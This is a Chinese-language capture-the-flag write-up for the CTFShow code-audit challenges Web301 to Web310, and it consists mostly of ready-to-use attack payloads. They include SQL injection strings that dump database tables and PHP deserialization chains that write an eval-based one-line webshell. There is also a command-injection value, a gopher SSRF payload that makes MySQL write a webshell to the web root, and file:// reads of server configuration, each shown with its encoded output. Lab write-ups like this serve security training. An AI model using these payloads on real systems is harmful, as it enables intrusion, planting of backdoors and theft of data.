CTFShow代码审计

---

Web301

题目环境,用Seay自动审计了一下，啥也没找出来

自己来，找到一处SQL注入没有任何过滤

payload
userid=1' union select 1#&userpwd=1

---

---

Web302

新增一个过滤


本地试一下

function sds_decode($str){
    
    
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode('1');
//d9c77c4e454869d5d8da3b4be79694d3

payload
userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#&userpwd=1

---

---

Web303

Seay扫到注入点，这次直接admin\admin就可以登录了

可以新增，

payload
dpt_name=1',sds_address =(select database())#

dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#

dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name="sds_fl9g")#

dpt_name=1',sds_address =(select flag from sds_fl9g)#

---

---

Web304

新增全局WAF

function sds_waf($str){
    
    
	return preg_match('/[0-9]|[a-z]|-/i', $str);
}

额，用之前的方法也还是可以拿到flag

dpt_name=1',sds_address =(select flag from sds_flaag)#

---

---

Web305

Seay扫到存在写文件，还存在反序列化


构造序列化链，写一句话马

class user{
    
    
    public $username;
    public $password;
    public function __construct($u,$p){
    
    
        $this->username=$u;
        $this->password=$p;
    }
    public function __destruct(){
    
    
        file_put_contents($this->username, $this->password);
    }
}
echo urlencode(serialize(new user('1.php','<?php eval($_POST[1]);?>')));
//O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D

蚁剑连上没找到flag，额，原来是在数据库里

---

---

Web306

login.php处的反序列化



构造链子，写一句话马

class dao{
    
    
    private $conn;

    public function __construct(){
    
    
        $this->conn=new log();
    }

    public function __destruct(){
    
    
        $this->conn->close();
    }
}
class log{
    
    
    public $title='1.php';
    public $info='<?php eval($_POST[1]);?>';

    public function close(){
    
    
        file_put_contents($this->title, $this->info);
    }

}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319

---

---

Web307

很明显了，只需要利用这个就可以写马了 $this->config->cache_dir

class config{
    
    
	public $cache_dir = ';echo "<?php eval(\$_POST[1]);?>" >1.php;';
}
class dao{
    
    
	private $config;
	public function __construct(){
    
    
		$this->config=new config();
	}
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDE6IjtlY2hvICI8P3BocCBldmFsKFwkX1BPU1RbMV0pPz4iID4gMS5waHA7Ijt9fQ==

---

---

Web308

还是从login.php这里的反序列化开始找链子





很显然就是要去利用$update_url带到checkUpdate去打SSRF，MySQL没密码

class config{
    
    
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%33%36%30%5d%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
    
    
    private $config;
    public function __construct(){
    
    
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxODoiAGNvbmZpZwB1cGRhdGVfdXJsIjtzOjc2MzoiZ29waGVyOi8vMTI3LjAuMC4xOjMzMDYvXyVhMyUwMCUwMCUwMSU4NSVhNiVmZiUwMSUwMCUwMCUwMCUwMSUyMSUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCU3MiU2ZiU2ZiU3NCUwMCUwMCU2ZCU3OSU3MyU3MSU2YyU1ZiU2ZSU2MSU3NCU2OSU3NiU2NSU1ZiU3MCU2MSU3MyU3MyU3NyU2ZiU3MiU2NCUwMCU2NiUwMyU1ZiU2ZiU3MyUwNSU0YyU2OSU2ZSU3NSU3OCUwYyU1ZiU2MyU2YyU2OSU2NSU2ZSU3NCU1ZiU2ZSU2MSU2ZCU2NSUwOCU2YyU2OSU2MiU2ZCU3OSU3MyU3MSU2YyUwNCU1ZiU3MCU2OSU2NCUwNSUzMiUzNyUzMiUzNSUzNSUwZiU1ZiU2MyU2YyU2OSU2NSU2ZSU3NCU1ZiU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUwNiUzNSUyZSUzNyUyZSUzMiUzMiUwOSU1ZiU3MCU2YyU2MSU3NCU2NiU2ZiU3MiU2ZCUwNiU3OCUzOCUzNiU1ZiUzNiUzNCUwYyU3MCU3MiU2ZiU2NyU3MiU2MSU2ZCU1ZiU2ZSU2MSU2ZCU2NSUwNSU2ZCU3OSU3MyU3MSU2YyU0NiUwMCUwMCUwMCUwMyU3MyU2NSU2YyU2NSU2MyU3NCUyMCUyNyUzYyUzZiU3MCU2OCU3MCUyMCU2NSU3NiU2MSU2YyUyOCUyNCU1ZiU1MCU0ZiU1MyU1NCU1YiUzMyUzNiUzMCU1ZCUyOSUzZiUzZSUyNyUyMCU2OSU2ZSU3NCU2ZiUyMCU2ZiU3NSU3NCU2NiU2OSU2YyU2NSUyMCUyNyUyZiU3NiU2MSU3MiUyZiU3NyU3NyU3NyUyZiU2OCU3NCU2ZCU2YyUyZiUzMSUyZSU3MCU2OCU3MCUyNyUwMSUwMCUwMCUwMCUwMSI7fX0=

---

---

Web309

这次MySQL有密码，猜测不是redis就是fastcgi了，一样的

---

---

Web310

这次如果还是按照上一题的方法打fastcgi传一句话马会发现可以传成功，但是用蚁剑去连读不到flag，很奇怪不知道为什么

看了眼大佬的方法，是去读nginx.conf，这个配置文件

class config{
    
    
    public $update_url ="file:///etc/nginx/nginx.conf";
}
class dao{
    
    
    private $config;

    public function __construct(){
    
    
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyODoiZmlsZTovLy9ldGMvbmdpbngvbmdpbnguY29uZiI7fX0=

找到了flag位置，就去读4476端口

class config{
    
    
    public $update_url ="http://127.0.0.1:4476/";
}
class dao{
    
    
    private $config;

    public function __construct(){
    
    
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMjoiaHR0cDovLzEyNy4wLjAuMTo0NDc2LyI7fX0=